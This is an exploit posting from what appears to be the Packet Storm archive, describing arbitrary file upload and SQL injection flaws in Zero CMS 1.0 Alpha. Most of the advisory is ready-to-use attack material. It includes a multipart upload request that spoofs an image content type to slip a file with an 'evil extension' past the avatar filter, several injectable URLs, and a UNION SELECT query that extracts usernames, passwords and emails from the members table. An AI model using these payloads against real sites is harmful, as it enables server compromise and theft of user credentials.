exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

zerocms-sql.txt

zerocms-sql.txt
Posted Jan 8, 2008
Authored by KiNgOfThEwOrLd | Site inj3ct-it.org

Zero CMS versions 1.0 Alpha and below suffer from arbitrary upload and remote SQL injection vulnerabilities.

tags | exploit, remote, arbitrary, vulnerability, sql injection
SHA-256 | 8e45f913d16b3b47f781b564f4b3bd381b09b20c9b55e301778a1ab9231283e6

zerocms-sql.txt

Change Mirror Download
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| ____ __________ __ ____ __ |
| /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ |
| | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ |
| | | | \ | |/ \ \___| | /_____/ | || | |
| |___|___| /\__| /______ /\___ >__| |___||__| |
| \/\______| \/ \/ |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Zero CMS Remote Arbitrary File Upload / SQL Injections |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Version: <= 1.0 Alpha (Last) |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Vendor: www.zero-cms.com |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Discovered by: KiNgOfThEwOrLd |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Intro: |
| |
| An attacker can bypass the avatar upload extension filter editing |
| the contenet type propriety |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Exploit: |
| |
| Submit to index.php?act=usercp&action=avatar a request like this: |
| |
| -----------------------------4629606643545053171986629955\r\n |
| Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n |
| \r\n |
| 20000\r\n |
| -----------------------------4629606643545053171986629955\r\n |
| Content-Disposition: form-data; name="avupload"; filename=" |
| [FILENAME].[EVIL_EXTENSION]"\r\n |
| Content-Type: image/jpeg\r\n |
| \r\n |
| [EVIL_CODE]\n |
| \r\n |
| -----------------------------4629606643545053171986629955\r\n |
| Content-Disposition: form-data; name="submit"\r\n |
| \r\n |
| Upload\r\n |
| -----------------------------4629606643545053171986629955-\r\n|
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| SQL Injections: |
| |
| The most of the variable related with the database are not properly|
| checked. Then, we get a lots of possible sql injections. |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Some Examples: |
| |
| index.php?act=poll&mode=view&id=%27 |
| forums/index.php?f=%27 |
| forums/index.php?t=%27 |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| An Exploit Example: |
| |
| index.php?act=poll&mode=view&id=9999+union+all+select+1,username, |
| password,email,5,6,7,8,9,10,11,12,13,14+from+zc_members |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Surelly there are other not filtred vars, but i don't feel like to |
| check, if u want u can find that yourself, dont you? :P |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]

Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    12 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    18 Files
  • 6
    Oct 6th
    16 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close